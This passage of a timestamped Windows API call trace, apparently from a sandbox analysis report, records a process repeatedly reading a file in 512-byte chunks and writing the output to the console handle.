GetFileType (hFile=0x50) returned 0x1 [0177.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.967] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.967] GetFileType (hFile=0x50) returned 0x1 [0177.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.967] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.967] GetFileType (hFile=0x50) returned 0x1 [0177.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.967] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.967] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.967] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.967] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.967] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.968] GetFileType (hFile=0x50) returned 0x1 [0177.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.968] GetFileType (hFile=0x50) returned 0x1 [0177.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.968] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | 
out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.968] GetFileType (hFile=0x50) returned 0x1 [0177.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.968] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.968] GetFileType (hFile=0x50) returned 0x1 [0177.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.968] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.968] GetFileType (hFile=0x50) returned 0x1 [0177.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.968] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.968] GetFileType (hFile=0x50) returned 0x1 [0177.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.968] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.968] GetFileType (hFile=0x50) returned 0x1 [0177.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.968] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, 
lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.968] GetFileType (hFile=0x50) returned 0x1 [0177.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.968] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.968] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.968] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.968] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.968] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.969] GetFileType (hFile=0x50) returned 0x1 [0177.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.969] GetFileType (hFile=0x50) returned 0x1 [0177.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.969] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.969] GetFileType (hFile=0x50) returned 0x1 [0177.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.969] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.969] GetFileType (hFile=0x50) returned 0x1 [0177.969] _get_osfhandle (_FileHandle=1) returned 0x50 
[0177.969] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.969] GetFileType (hFile=0x50) returned 0x1 [0177.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.969] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.969] GetFileType (hFile=0x50) returned 0x1 [0177.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.969] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.969] GetFileType (hFile=0x50) returned 0x1 [0177.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.969] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.969] GetFileType (hFile=0x50) returned 0x1 [0177.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.969] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.969] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.969] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) 
returned 1 [0177.969] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.969] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.970] GetFileType (hFile=0x50) returned 0x1 [0177.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.970] GetFileType (hFile=0x50) returned 0x1 [0177.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.970] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.970] GetFileType (hFile=0x50) returned 0x1 [0177.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.970] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.970] GetFileType (hFile=0x50) returned 0x1 [0177.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.970] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.970] GetFileType (hFile=0x50) returned 0x1 [0177.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.970] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.970] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0177.970] GetFileType (hFile=0x50) returned 0x1 [0177.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.970] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.970] GetFileType (hFile=0x50) returned 0x1 [0177.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.970] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.970] GetFileType (hFile=0x50) returned 0x1 [0177.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.970] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.970] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.970] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.970] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.970] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.970] GetFileType (hFile=0x50) returned 0x1 [0177.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.971] GetFileType (hFile=0x50) returned 0x1 [0177.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.971] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.971] GetFileType (hFile=0x50) returned 0x1 [0177.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.971] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.971] GetFileType (hFile=0x50) returned 0x1 [0177.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.971] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.971] GetFileType (hFile=0x50) returned 0x1 [0177.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.971] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.971] GetFileType (hFile=0x50) returned 0x1 [0177.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.971] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.971] GetFileType (hFile=0x50) returned 0x1 [0177.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.971] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, 
lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.971] GetFileType (hFile=0x50) returned 0x1 [0177.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.971] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.971] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.971] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.971] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.971] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.971] GetFileType (hFile=0x50) returned 0x1 [0177.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.972] GetFileType (hFile=0x50) returned 0x1 [0177.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.972] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.972] GetFileType (hFile=0x50) returned 0x1 [0177.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.972] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.972] GetFileType (hFile=0x50) returned 0x1 [0177.972] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0177.972] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.972] GetFileType (hFile=0x50) returned 0x1 [0177.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.972] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.972] GetFileType (hFile=0x50) returned 0x1 [0177.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.972] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.972] GetFileType (hFile=0x50) returned 0x1 [0177.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.972] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.972] GetFileType (hFile=0x50) returned 0x1 [0177.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.972] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.972] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.972] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.972] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.972] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.973] GetFileType (hFile=0x50) returned 0x1 [0177.973] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.973] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.973] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.973] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.973] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.973] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.973] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, 
lpOverlapped=0x0) returned 1 [0177.973] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.973] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.973] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.974] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.974] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.008] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.008] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.008] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.008] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, 
lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.008] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.008] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.009] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.009] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.009] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.009] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.009] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.009] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.009] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: 
